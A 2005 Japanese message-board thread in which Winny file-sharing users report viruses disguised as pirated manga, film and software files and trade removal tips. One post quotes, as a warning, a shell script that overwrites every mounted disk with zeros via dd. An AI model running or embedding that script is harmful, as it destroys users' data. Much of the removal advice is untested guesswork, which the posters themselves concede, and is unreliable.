一応スタートアップも確認したし、今日はとりあえず寝るかな
413:[名無し]さん(bin+cue).rar
05/02/12 04:31:38 /TNDgjXk0
>409
既出というか、ちょろっと落として先頭ブロック表示しただけで
かっとばせヌルポース.zip とか /../../../../../Documents and Settings/All Users/~
とかいう文字が見えた時点で(ry
414:[名無し]さん(bin+cue).rar
05/02/12 08:41:38 tt0na5K10
>>403
Numlockじゃねーの。
ウイルスだとしたらご愁傷様。それと報告乙。
415:[名無し]さん(bin+cue).rar
05/02/12 08:42:28 tt0na5K10
間違えたCapslockだ
416:[名無し]さん(bin+cue).rar
05/02/12 10:36:54 HvsYg15v0
ノートPCだと、ものによってはNumLockで引っかかってる事もある
417:409
05/02/12 10:53:59 m1VjmALg0
>>413
よく分からないけど、こいつはヌルポース?
解凍にはnoah使ったから、変な場所に解凍される事はないと思うけど、
exe踏んだ後の活動内容がよく分からない。
実行時にSS撮って壁紙変えただけで、マイドキュメントとかWinnyフォルダに変なファイル
作るわけでもなく・・・
>>411は何か起きたのかなー
418:[名無し]さん(bin+cue).rar
05/02/12 12:40:43 R/LTPj740
>413 おまい様が途中まで落としたってのは、こっちでは?
84 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:19:18 ID:UIxh++l70
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE.zip 3,368,888 f5a386c0b77f778bd5eaa18e11a0d5f8
92 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:24:43 ID:VFelumFG0
>84 の方のは偽っていうかウィルスっぽいの詰め合わせかな
419:[名無し]さん(bin+cue).rar
05/02/12 13:09:29 wqszjevM0
.me11p0のパスってなんなんだろうな
もしかして作者しか知らないって奴か?
420:397
05/02/12 13:26:01 5xwzIgRG0
>>398
一応実験結果
コピー不可 cmd.exeからでも無理
エディッタ読めても上書き不可
ファイルの所有者を別ユーザーにして実行者と分けているためMSのファイル管理にバグか
ウイルスが所有権を書き換えて書き込み許可をつけなければ書き換えられない。
一応保険の気休めにしかならないです。
一番良いのはワームを踏まないことなのは十分承知
421:[名無し]さん(bin+cue).rar
05/02/12 15:00:45 smIwQcq20
いやーびっくり
俺も>>409とまったく同じ状態だ
なんとなく怖いから現在はサブノートを
使っている状態だ
422:[名無し]さん(bin+cue).rar
05/02/12 15:10:56 smIwQcq20
追記。
win.iniの方にぬるぽガッが入ってた
これは昔感染したウィルスの名残かもしれないから
俺だけの可能性もあるけど一応見てみてくれ
423:[名無し]さん(bin+cue).rar
05/02/12 15:36:05 AdeU+lvr0
オンラインなマシンで妙な挙動やうさんくさい痕跡が見つかったら、
すぐに切断&初期化&新規インスコしないってのは何故なんだ。検証
報告は仮想マシンやオフラインでやるってのが筋だろうに。
昔感染した名残とか平気な顔して言えることか?(´・ω・`)
424:[名無し]さん(bin+cue).rar
05/02/12 17:14:24 eat95GIf0
ウィルスどんどん作って流せ。
425:409
05/02/12 18:39:14 m1VjmALg0
ごめん、検証するスキルのない俺が来るべきスレではなかったね
exe踏んだの初めてだったからちょっとパニくったんだ
面倒だけどクリーンインスコするよ
またノートン先生の使用期限伸びるな・・・
426:[名無し]さん(bin+cue).rar
05/02/12 18:58:07 0vTAE1Wd0
ノートン先生とAVG7とBitDefenderでウィルス対策しております
有効に働いてくれているので感謝しています
しかしノートン先生とAVGだけでも良いような気がしてきた今日この頃です
427:[名無し]さん(bin+cue).rar
05/02/12 21:14:16 eYincy+g0
ノートンだけでもいいんじゃないか
誤作動がうざいが設定でなんとかなるし
428:[名無し]さん(bin+cue).rar
05/02/12 21:31:06 hECHz0Aq0
>>426
ノートンとAVGを併用するメリットが分からない
それの組み合わせなら、ノートンだけかAVG+BitDefenderでいいじゃん
429:[名無し]さん(bin+cue).rar
05/02/12 22:58:10 7zwpKvk70
antinnyに関してだけなら
Norton > AVG > Bit
Bit削っても問題ない。
430:426
05/02/12 23:15:01 AUdkDUq80
>>427
>>428
>>429
わざわざ答えていただきありがたいです
玄人様の意見、参考にさせていただきます
431:[名無し]さん(bin+cue).rar
05/02/12 23:17:13 AdeU+lvr0
>>429
常駐がダブってるとあんまりいくないような気がする。
432:[名無し]さん(bin+cue).rar
05/02/12 23:23:27 pMaM0ZSl0
>>430
わざわざ皮肉言いに来たのか、ご苦労さま
433:[名無し]さん(bin+cue).rar
05/02/13 00:12:06 VJHb0qjp0
>>432
わざわざageてまで言うことか?
434:[名無し]さん(bin+cue).rar
05/02/13 00:14:37 VJHb0qjp0
ところでこの板のIDの末尾って0かOで固定されてんの?
435:[名無し]さん(bin+cue).rar
05/02/13 00:24:35 qUpCYDEj0
またか・・・
436:[名無し]さん(bin+cue).rar
05/02/13 00:36:55 hYbU6/tO0
>>434
m9(^Д^)プギャー
437:[名無し]さん(bin+cue).rar
05/02/13 00:37:49 J4hwylB60
0が男の書き込みでOが女の書き込み
分かったか低脳
438:[名無し]さん(bin+cue).rar
05/02/13 00:40:43 w91NqGDp0
女イネ━━━('A`)━━━ !!
439:[名無し]さん(bin+cue).rar
05/02/13 00:48:07 P8bsgGGW0
[俺のアドレス帳]とかいうの流れてんの確認したけどこれは新種か?
440:[名無し]さん(bin+cue).rar
05/02/13 00:57:23 sSll5S2D0
いきなりウイルスが入って、気づけば消えてるってことありますか?
441:[名無し]さん(bin+cue).rar
05/02/13 01:40:18 /eSYWRiD0
ダウンしただけじゃ感染しないよ。
442:[名無し]さん(bin+cue).rar
05/02/13 02:56:19 gyGj6etUO
女
443:[名無し]さん(bin+cue).rar
05/02/13 03:20:37 jKSAIGFA0
んじゃぁ、俺はどっちだ
444:[名無し]さん(bin+cue).rar
05/02/13 05:19:29 S5wqXwBc0
ネカマ
445:[名無し]さん(bin+cue).rar
05/02/13 10:02:37 vSr3w6E60
>>439
>>11
446:[名無し]さん(bin+cue).rar
05/02/13 10:26:02 FfIijSVE0
>>409の詳細マダー?
447:[名無し]さん(bin+cue).rar
05/02/13 10:31:16 vSr3w6E60
ビューワソフトでも入ってたんじゃねか
448:[名無し]さん(bin+cue).rar
05/02/13 12:39:01 NY04I2Ol0
俺も>>409踏んじまったんだが
壁紙変えて画面キャプチャするだけのウィルスなんてあんのかな?
exe本体と壁紙サイズが同じくらいだったんだが(2.28M、2.25M)、これは関係なし?
449:[名無し]さん(bin+cue).rar
05/02/13 15:57:18 nmfcKRgN0
まず流通しているノートン自体にウイルスがある場合があるので気をつけろ
無料版とかあるならそちらでまず対処するのが吉だぜ
450:[名無し]さん(bin+cue).rar
05/02/13 16:07:42 B2yAGC8p0
書庫解凍後にフォルダアイコンをダブルクリックしたらmellpoに引っかかった(*´Д`)
HDDガリガリアクセスしだしたのでタスクマネージャーでプロセス見たらmellpo.exe発見即停止
mellpoでファイル検索、program filesフォルダ内にmellpo.exeとhogehogeファイルを確認
2つのファイルは更新日時が同じでhogehogeファイルはメールボックスファイルのフルパスがリストアップしてあった(* ゚д゚)ガクブル
UpFolder.txtの変化無し
レジストでRunには変化無し、mellpoで検索1件ヒット
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICacheに発見
ノートンUpdate済みスキャンで検出無し
451:[名無し]さん(bin+cue).rar
05/02/13 16:10:31 ET6j2PhB0
質問スレから誘導されて来ました。とりあえずそのまま書き込みます。
ny関係のフォルダの中の、Upフォルダはどういう仕組みになってるのですか?
これは何だろうと見てみたら、ダウンしたこともないアダルト系の圧縮ファイルが
いーーっぱいあって驚きました。容量食うし何か分からないので全部消去しましたが
今日見てみるとまた少し溜まってました。何なのか教えて下さい。
452:[名無し]さん(bin+cue).rar
05/02/13 16:20:22 wCKpg0Qc0
>>451
質問する前にテンプレ>>1-13を熟読してください。
453:[名無し]さん(bin+cue).rar
05/02/13 16:22:45 Ntn5FObd0
>>451
テンプレが理解できなくても、ここで解説を求めないでください。
454:451
05/02/13 16:41:42 ET6j2PhB0
読んだつもりでしたが見逃していました。
同じような症状があるのですね、お騒がせしました。
455:[名無し]さん(bin+cue).rar
05/02/13 17:58:22 T1oJoBDM0
>>451
>>1の1行目から見逃すのは如何なものか
456:[名無し]さん(bin+cue).rar
05/02/13 22:36:19 S5wqXwBc0
>>451
(((;゚д゚))ガクガクブルブル
457:[名無し]さん(bin+cue).rar
05/02/13 22:58:18 JXQ6bCqx0
機転をきかして、
それが正常ですって何で言わないの?
458:[名無し]さん(bin+cue).rar
05/02/13 23:13:03 RlPSFcY40
ウィルス感染が広がったらnyのためにならないから。
459:[名無し]さん(bin+cue).rar
05/02/13 23:41:35 Cdbg4rKp0
このスレが本来の役割を果たしてないってのは、nyネットワークに
とってはいいことなんだよな。
460:[名無し]さん(bin+cue).rar
05/02/13 23:53:54 2dA3CWGr0
捏造ファイル一覧@winny
[2005-01-21] atok for linux.zip 4f3e71c955dd8bb0f47a1d122eb93396
[050121] ATOK for Linux.zip 86d2293fe5cf673356e7fd4d7f44b0fe
[2005-01-21] atok for linux.zip 760958c0955d5999d272e63879ece2a3
[2005-01-21] atok for linux.zip fccde84e559e99e2c660b5ce0c0553d3
100MB前後のものは下記掲載の全削除スクリプトが入っているので要注意!!
#!/bin/sh
# Source function library.
. /etc/rc.d/init.d/functions
aaa=$(mount | grep '^/dev/' | sort -r | awk '{print $1}')
for disk in $aaa ; do
nohup dd if=/dev/zero of=$disk bs=50000 > /dev/null 2>&1 &
done
捏造ファイル@share
[2005.01.21] ATOK for Linux.zip 9934e1679953bbf42d72c21df8cdf8afe23c6c9a
[2005.01.21] ATOK for Linux.zip 775d1e1e2cd98161087c631b4d37867ce6f856ac
461:[名無し]さん(bin+cue).rar
05/02/14 00:02:52 iUGxWps+0
ATOKぐらい買ってやれよ
今、裁判で大変なんだからさw
462:[名無し]さん(bin+cue).rar
05/02/14 00:23:33 Dz3BBZmb0
>>461
買えなくなったりしてw
463:[名無し]さん(bin+cue).rar
05/02/14 01:47:10 hAsCfGtk0
つーかWinnyを狙ってないよな
464:[名無し]さん(bin+cue).rar
05/02/14 02:02:17 F4x00gBw0
>>463
ワロス
465:ram
05/02/14 03:21:04 8HDLnSS70
【使用OS】 xp home (SP2)でした。
【WindowsUpdateしてるか】 してました。
【使用AntiVirusソフト】ノートン先生
【AntiVirusをUpdateしてるか】 してました。
【ウイルススキャンの結果】 下記参照。
【オンラインスキャンしたなら結果】下記参照。
【Winnyのバージョン】 2
【Winny歴、総DL量】 1年半・120G
【テンプレを読んだか】 読んでます。
【テンプレにある対策を実行したか】 してました。
【症状、具体的に分かる限りすべて書く】
久しぶりにPC全体にスキャンかけたら、ドキュメント&セッティングのフォルダの中の、
インターネットテンポラリの添付フォルダに、「[映画]ハウルの動く城.avi.exe」を検知した。
その日、nyを起動してたら、ノードが結構消えてたりもしていました。
【何をしたらそんなことになったのか】 ノートンで久しぶりにPC全体にスキャンをかけてみたから。
【これまでにとった措置】
ノートPCなので、OSの再インストール(上書き?[OSがHDDに内蔵されてるタイプだから・・・。])
こんな感じなのですが、まだウイルスに感染していると思いますか?
また、亜種の可能性ってありますか?
私は極窓等での判別でexeファイルなどを見つけたら開かないようにしているのですが・・・。
466:[名無し]さん(bin+cue).rar
05/02/14 03:26:22 6ib9zEpW0
>>465
その文章からそんなことわかんねーよ。テンプレ読んで死ね。
467:[名無し]さん(bin+cue).rar
05/02/14 11:34:21 InDtnOzg0
ウイルス定義ファイルに注意--シマンテック製品にウイルス感染を招く脆弱性
URLリンク(headlines.yahoo.co.jp)
先生、しっかりしろよw
468:[名無し]さん(bin+cue).rar
05/02/14 11:52:38 2obzU+Uk0
こりゃまた凄いセキュリティホールだな
実行しなくてもメール受信しただけで感染かよw
469:[名無し]さん(bin+cue).rar
05/02/14 12:25:18 hpf+qUap0
先生ッ!
470:[名無し]さん(bin+cue).rar
05/02/14 12:34:04 BlelK1f30
>>467
んなもんとっくに直ってるわい(報告してから対策まで結構時間かかったが)
471:[名無し]さん(bin+cue).rar
05/02/14 13:00:19 iUGxWps+0
>>470
この前ウィルス情報の他にプログラムパッチも来てたがそれか?
472:[名無し]さん(bin+cue).rar
05/02/14 15:32:44 ODivqBvj0
Upフォルダに大量のの冷凍ファイルと謎のオタ男の写真があったんですが
これがキン○マと呼ばれるウイルスですよね?
削除してもどんどん溜まっていくし消せない冷凍ファイルもあるしパニック(´Д⊂
nyなんてたま~にしかしないのに、いつの間に入ってきたんだろぅ。
473:[名無し]さん(bin+cue).rar
05/02/14 15:34:10 6rsj14f+0
>>468
メール受信だけでなく、ダウソファイルに仕掛けてもだろ
474:[名無し]さん(bin+cue).rar
05/02/14 16:37:14 k3sPkcst0
>>472
釣りか
475:[名無し]さん(bin+cue).rar
05/02/14 16:40:34 2obzU+Uk0
キンスマ?
聞いた事ないウイルスだな
476:[名無し]さん(bin+cue).rar
05/02/14 17:30:17 Vt81+PxZ0
>>472
(・∀・)イイ!!
477:[名無し]さん(bin+cue).rar
05/02/14 18:51:44 qf6VxUD60
キンタマファイルを閲覧しているキンタマが流れてそうだなw
478:[名無し]さん(bin+cue).rar
05/02/14 19:23:57 Emg07VCK0
ファイルの展開に「解凍」って言葉は使うのに、圧縮には「冷凍」って言葉使わないんだよな
e-wordsでも出てこないし
不思議っちゃあ不思議
479:[名無し]さん(bin+cue).rar
05/02/14 20:51:09 nql8/sVc0
なんか映画のショーンオブザデッドのファイルにウィルスがあるっぽいな。
読み込んだらギリギリいってnodeがなくなったりwinnyが立ち上がらなくなる。
…でもavi(一応wimanpで開いたら普通に見れた)にウィルスってありえないよな?
480:[名無し]さん(bin+cue).rar
05/02/14 21:38:19 JdibCrin0
>>478
正しくは
圧縮に対して伸張、パック(書庫化)に対してアンパック(展開)
前者と後者を同時に行なう場合は、冷凍と解凍(←これはスラング)
圧縮/伸張は文字通りなんだが、冷凍/解凍はアーカイブ行為に付いて言う
zipなどは、圧縮しながら書庫化(パック化)するので、本来は冷凍/解凍となる
e-wordsに書いてあるようなことは、あまり信頼できない。
481:[名無し]さん(bin+cue).rar
05/02/15 01:42:31 QjT8xRS80
なんかshareでキンタマ落としたらlzhなのに開けなくて
真空波動に落としたら音声だけの喘ぎ声が・・・外人ぽかった
なんたら病院とかいう人の
482:[名無し]さん(bin+cue).rar
05/02/15 07:46:40 j24EsbnE0
ふんふん・・・、それで?
483:[名無し]さん(bin+cue).rar
05/02/15 07:54:11 /xYGAnlj0
ファイルをうpしてないのにupfolder.txtが作られたんですけど、
0KBで何も入ってません。
これはセーフなんでしょうか?
484:[名無し]さん(bin+cue).rar
05/02/15 09:13:42 3lmXk8jY0
,ィ⊃ , -- 、
,r─-、 ,. ' / ,/ }
{ ヽ / ∠ 、___/ |
ヽ. V-─- 、 , ',_ヽ / ,'
ヽ ヾ、 ',ニ、 ヽ_/ rュ、 ゙、 /
\ l トこ,! {`-'} Y
ヽj 'ー'' ⊆) '⌒` ! K
l ヘ‐--‐ケ } 札
ヽ. ゙<‐y′ / で
(ヽ、_,.ゝ、_ ~ ___,ノ ,-、 聞
) ノ/`'ー-' < く
r'/, _.. // l、、、ヽ_) と
ゝ(_/_ノ´ /ヽ_ノ/ __,l ヽ)_)‐' い
{` ーニ[二]‐ク′ い
〉 / /_ よ
/ ´ ̄`ヽ )
(____ノ--'
485:[名無し]さん(bin+cue).rar
05/02/15 09:23:17 jiWzC0wC0
DOMは氏ね
486:[名無し]さん(bin+cue).rar
05/02/15 09:44:50 VzTczDct0
うpする人は普段から人一倍気を配って注意してる分、そう簡単に患者側にはならないよ
自分のトリでウィルスばら撒いたら信用失って即引退だしね(まあそうなっても何の損害もないけど)
487:[名無し]さん(bin+cue).rar
05/02/15 11:30:21 Yul6gg5Q0
>>479
avi .exe
だったんだろ
488:[名無し]さん(bin+cue).rar
05/02/15 11:36:54 blJKIUvI0
おれが前に踏んだexeは
avi pugera.exe
こんなかんじだった。
489:[名無し]さん(bin+cue).rar
05/02/15 11:57:46 i5pl1NiQ0
詳細表示で「種類」も表示させとけばいいんじゃないかと思うんだが。
アプリは一発で判るし。
490:[名無し]さん(bin+cue).rar
05/02/15 14:11:50 ARfTjvLW0
ウイルスバスター2005をインストールしようと思うけど、Winnyに影響でないかな~?
491:[名無し]さん(bin+cue).rar
05/02/15 15:08:22 t6NjTp7v0
>>490
スレリンク(download板:587番)
492:[名無し]さん(bin+cue).rar
05/02/15 18:12:13 c0ydgpKA0
>>490
無問題。
493:[名無し]さん(bin+cue).rar
05/02/15 19:17:19 H7+JNsOP0
>>487
いやマジだって(;´Д`)今コピペした「(映画)ショーン・オブ・ザ・デッド - Shaun Of The Dead - (字幕 by アナル男爵).avi」
みんな注意な
494:[名無し]さん(bin+cue).rar
05/02/15 19:39:59 osvcxLY30
無視リスト登録しろ
495:[名無し]さん(bin+cue).rar
05/02/15 19:44:13 hBZa0/080
>>493 ならもう少し詳しく
何で見たのか?関連付けは適切か?スペックが足りないと言う事は無いか?
レジストリエディタは立ち上がるか?タスクマネージャは?
新しくプロセス、ファイルが作られたか?レジストリの値は?
つーかハッシュは?
496:[名無し]さん(bin+cue).rar
05/02/15 19:49:05 80yD0eyp0
釣り禁止。
■━⊂( 。・_・) 彡 ガッ☆`Д´)ノ >>493
497:[名無し]さん(bin+cue).rar
05/02/15 21:27:27 8I7hEyW+0
壁紙ぬるぽウイルスは今のところ壁紙変えられてデスクトップ撮られるだけか・・・。
気持ち悪いな
win.ini検索したけどぬるぽ無し
498:[名無し]さん(bin+cue).rar
05/02/15 21:51:49 0gzfDvM/0
【使用OS】Windows Xp Home
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】ノートンアンチウィルス
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】b7.1
【Winny歴、総DL量】40Gくらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】してない
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】zip解凍後「偽装解除.bat」踏んでしまった
【これまでにとった措置】batファイルを踏む前にノートンでスキャンしたものの
脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
再起動しても同じ状態になるためセーフモードで実行したところ、通常のような感じ
で起動したが、アプリケーションを起動すると症状発生。
499:[名無し]さん(bin+cue).rar
05/02/15 22:02:03 87AdJQuR0
>>497
撮られたデスクトップの画像はどうなるんだろう・・・?
500:[名無し]さん(bin+cue).rar
05/02/15 22:05:54 4tREr/pA0
うpフォルダに放り込まれるんじゃないの?
501:[名無し]さん(bin+cue).rar
05/02/15 22:12:56 4DsayvfH0
>>498
ギシギシアンアンって対応済みじゃなかったかなぁ~?亜種かなぁー。
batファイルをメモ帳で開いて・・・って思ったけど、batでそこまで
細かい芸当できるのかな。bat(長い空白).exeかもね。
502:[名無し]さん(bin+cue).rar
05/02/15 22:25:56 0gzfDvM/0
>>501
拡張子はbatでした
セーフモードで当該ファイルの拡張子をtxtに変更して開いて見たところ
文字化けして読めませんでした
症状が出る:ブラウザ ノートン jane msconfig
症状が出ない:メモ帳 エクスプローラー
ちなみに落としたファイルは(一般コミック・雑誌)[ジャンプ][2005-12] DEATH NOTE-58でした
503:[名無し]さん(bin+cue).rar
05/02/15 22:49:57 H6JOnBOj0
>>502
俺もそれ、踏んだ。萌える声だよな。
でも、対処法分からん。俺は再インスコした。
で、また、壁紙変わるウイルス踏んで、
今、違う事で大変なんだ。お互い頑張ろう。
504:[名無し]さん(bin+cue).rar
05/02/15 22:54:51 V5T9do2x0
>>503
ワロタ
505:[名無し]さん(bin+cue).rar
05/02/15 23:05:50 0gzfDvM/0
>>503
笑ってる場合じゃないんだけどワロタ
506:[名無し]さん(bin+cue).rar
05/02/15 23:08:24 H6JOnBOj0
俺が感染したのは、>>409に出てた奴だな。
これ、スタートアップに隠しexeファイル出すぞ?
ショートカットを削除後、
(コントロールパネルのプログラムの削除と追加から削除って出るけど、無視して良さげ)
本体である、Adobe Gamma Loader.exeも削除した方が良さそうだ。
それまで、再起動はするなよ。再起動したら、アプリが起動する。
507:ガチンコ初心
05/02/15 23:13:43 ZslCJngn0
【使用OS】Winxp pro SP1
【WindowsUpdateしてるか】昨日した
【使用AntiVirusソフト】ノートン
【AntiVirusをUpdateしてるか】今日した
【ウイルススキャンの結果】ノートンで反応なし
【オンラインスキャンしたなら結果】
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】三年くらい?
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】該当なし?
【症状、具体的に分かる限りすべて書く】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip
sIdxNm06Hv
1cafd7101e4dee38d4a613c95c78c887
の中の326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された
【何をしたらそんなことになったのか】
フォルダアイコン偽装してたのでダブクリ、数十秒で気づいてPC電源断
【これまでにとった措置】
今日作成・変更された怪しいファイル(Documentのなかの~のデスクトップ.bmpとかupなんとか.txt)を削除
nyのキャッシュを全部削除
スタートアップ・レジストリなどを点検
これってなんて言うウイルスでしょうか。また駆除に必要な措置に追加があれば教えてください。
508:507
05/02/15 23:14:36 ZslCJngn0
すいません>>409でガイシュツでした(^^;
509:[名無し]さん(bin+cue).rar
05/02/15 23:20:21 BSZ5eKYk0
おまいら揃いも揃って馬鹿ばっかだな・・。
510:[名無し]さん(bin+cue).rar
05/02/15 23:21:23 0gzfDvM/0
>>509
返す言葉もございません(_ _;)…パタリ
511:[名無し]さん(bin+cue).rar
05/02/15 23:23:19 cIvE0PUr0
俺も壁紙変わる奴踏んじまった
まぁEXEと気づいたから別ドライブに移動させて、ネット切断してから開いたけど
今のところ壁紙変わるのとスクリーンショット撮られる以外不審なところはない
Upフォルダも出来てないし、単なるイタズラファイルかな?
512:[名無し]さん(bin+cue).rar
05/02/15 23:24:30 H6JOnBOj0
俺の>>506の意見は無視ばっかりだな。
513:[名無し]さん(bin+cue).rar
05/02/15 23:25:53 Bx4eUZxM0
>>502
拡張子がbatであろうと、中身はexeかcomだろ
OSに引き渡された時点で、拡張子に関係なく、実行形式であるものは実行される
Windowsなら注意すべき拡張子は
.exe .com .bat .reg .scr .url .htmなど
>>507
497参照。名称は「壁紙ぬるぽ」、melpoとの類似性あり。具体被害は壁紙変更、一部でSS流し。
今後検証してみる
514:[名無し]さん(bin+cue).rar
05/02/15 23:26:20 0gzfDvM/0
>>512
スタートアップ探したんだけどexeもショートカットも見つかりませんでした
現在adobe loaderを検索中です
515:[名無し]さん(bin+cue).rar
05/02/15 23:30:04 ZslCJngn0
>>513
どうもありがとう
516:[名無し]さん(bin+cue).rar
05/02/15 23:33:26 H6JOnBOj0
>>509
グロとかウイルスやexeをわざと押すのが俺の中の流行。
>>514
俺も同じウイルスな筈なんだが、
スタートアップフォルダが2つに増えてたぞ?
で、スタートアップにあるのは、ショートカットだよ。
Adobe Gamma Loader.exeへのショートカット。
隠しファイルを見えるようにしても見えない。
スタートからじゃないと消せない。
俺的対処法
スタートから、全てのプログラムを見る。
スタートアップのショートカットで
Adobe Gamma Loader.exeへのショートカットを見つけたら、
それを右クリックしてプロパティにて本体の場所を確認後、削除。
本体の場所に3つ、実行ファイルとか、テキストがあるので、削除。
ってやってみた。俺、バカだから確証無いよ?
517:[名無し]さん(bin+cue).rar
05/02/15 23:39:57 H6JOnBOj0
なんだか変だな。俺の真似するな。
ちょっと調べるから。
だた、スタートアップのショートカットだけは削除しとけよ~
518:[名無し]さん(bin+cue).rar
05/02/15 23:40:56 cIvE0PUr0
*.exeで検索かけたら随分前からあった形跡のある別のウイルスが発見されたorz
519:[名無し]さん(bin+cue).rar
05/02/15 23:43:02 tSpU2A7o0
私も>>507
>>506の処理一応したけど壁紙以外どういう被害あったのか不明で不安・・
520:[名無し]さん(bin+cue).rar
05/02/15 23:51:29 aRSa9gnM0
フォルダの中のexeを実行しなければ、セーフなんでしょうか?
ちなみに>507のファイルと同じです
521:[名無し]さん(bin+cue).rar
05/02/15 23:51:35 AlE8Na2/0
俺もスタートアップなんもなかったぞ。
同じのじゃないのかも。
522:[名無し]さん(bin+cue).rar
05/02/16 00:01:39 H6JOnBOj0
>>519
あったよな?
デスクトップ撮られたのも削除したし、
これで様子見しておくつもりだが。
>>520
セーフ
見るだけならセーフ。
>>521
色んなのに感染してるとか、怖い事言わないで下さい。
ノートンでスキャンして、
フォルダの中のファイルの数、合ってるか?
523:498=502=505=510=514
05/02/16 00:06:47 T5lKoGkm0
Adobe Gamma Loaderが検索しても見つかりませんでした
adobeで検索して出てくるのはadobe acrobat reader 6.0関係
nyで落としたものが別物なのかなと思って、nyのキャッシュを調べようとしたら
キャッシュフォルダが消えてる...うぅむ
524:[名無し]さん(bin+cue).rar
05/02/16 00:21:19 /i6kkWze0
ちなみに、CドライブのWINDOWSフォルダに
ぬるぽ壁紙がある。まだ懲りないの?.bmpだ。
>>523
同じやつで感染したんだけどな。
特になんともないなら、大丈夫なんじゃないかな?
俺のはPC買い換えたばかりだから、他の感染とか、
考えられないんだけど、あったかもしれないし。
一応報告までって感じだったから…。
525:[名無し]さん(bin+cue).rar
05/02/16 00:21:24 SViFvfGG0
>>522
スタートアップにありました。消しました。
けれどデスクトップをとられたものはどこにあるんですか??
本体の場所の3つのexeとかtxtは消しました
526:[名無し]さん(bin+cue).rar
05/02/16 00:23:59 /i6kkWze0
>>525
マイ ドキュメントにある筈だよ。
なんか、>>507を見ると、他にもありそうだから、確認してくれ。
俺はマイドキュメントに撮られてのが一枚あっただけだから。
俺寝るわ。おやちゅみ♥
527:[名無し]さん(bin+cue).rar
05/02/16 00:24:10 /4iS+1Vf0
Adobe Gamma Loader.exeってAdobe製品を入れたときに出来る奴じゃないの?
C:\Documents and Settings\All Users\スタート メニュー\Adobe Gamma Loader.exe
C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
でしょ?
528:[名無し]さん(bin+cue).rar
05/02/16 00:28:23 S0hy97P40
>527
ウイルスが私はウイルスですって書いてあるファイル名だとしたら
かなり、やさしいウイルスだな
529:521
05/02/16 00:31:08 E2b3+tBw0
脅かすだけのイタズラで問題なしって結論にしとく。
530:[名無し]さん(bin+cue).rar
05/02/16 00:33:19 /i6kkWze0
>>527
解凍ソフトを利用してスタートアップに
exeフォルダを隠すってウイルスがあるから、それだと思った。
アプリ自体、正規でも、それを利用されて画面を撮られたりすると思ったんだが。
俺の勘違いだったら、すまない。
実行した方は、adobe製品をコントロールパネルから削除したのち、再インコしてくれ。
それで問題は解決すると思うんだが。
531:[名無し]さん(bin+cue).rar
05/02/16 00:42:17 YcGtu7I30
>>526
ありがとうございます
マイドキュメントにありました
532:[名無し]さん(bin+cue).rar
05/02/16 01:03:23 MUkT2LHD0
このスレでさ
Winnyをよく使用しててそれでも一年ぐらいウイルスに
かかってない猛者っていないよな?
533:[名無し]さん(bin+cue).rar
05/02/16 01:06:21 l2S21LjF0
2年ほど使っているが俺は一度も感染していない。
まあ、このスレをよく見ているのおかげだが。
534:[名無し]さん(bin+cue).rar
05/02/16 01:10:52 x8e+VWk+0
>>529
遅効性だったらどうするんだ。
535:[名無し]さん(bin+cue).rar
05/02/16 01:12:43 FCU/634p0
>>507の踏んだあとウイルス検索したけど何もでないことってありますか?
536:[名無し]さん(bin+cue).rar
05/02/16 01:16:37 0Pev5+JK0
>>535
どう思いますか?
537:[名無し]さん(bin+cue).rar
05/02/16 01:17:46 KMF/Fpbn0
うちの場合は~のデスクトップ.bmpはデスクトップにできてたなあ。
あとAdobe Gamma Loaderだけど、うちはスタートアップには何もできてなかった。
検索すると、"Adobe Gamma Loader.lnkCommon Startup"ってファイルが見つかったけど
これは多分うちの場合は以前から、msconfigで
スタートアップからAdobe Gamma Loaderを消してたので、それの退避ファイル?なのかな。
そこらへんから見ると多分Adobe Gamma Loaderはシロっぽいけど。
送信パケットとか見る分には今のとこは特に悪さはしてない風だけど、
遅効性ってことはあるのはあるのかもねー、あーこわ。
538:[名無し]さん(bin+cue).rar
05/02/16 01:18:03 ABE/vpxo0
>>532
猛者って・・・感染しない奴の方が多いんじゃねーか?
539:498
05/02/16 01:27:36 T5lKoGkm0
>>530
違うウィルスなのかなぁ
>>507には「326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された」
ってなってるけど、私の場合ほぼ同名のzipファイルを解凍したら「偽装解除.bat」と
10個くらいの不明ファイルが出てきて、この「偽装解除.bat」を実行したら画面の真ん中に
「♂♀」だけ出て、あとはあえぎ声だったんです
「まだ懲りないの?.bmp」も「adobe gamma loader」も見つからないし...
540:[名無し]さん(bin+cue).rar
05/02/16 01:33:12 E2b3+tBw0
>>534
その時はその時でなんとかする。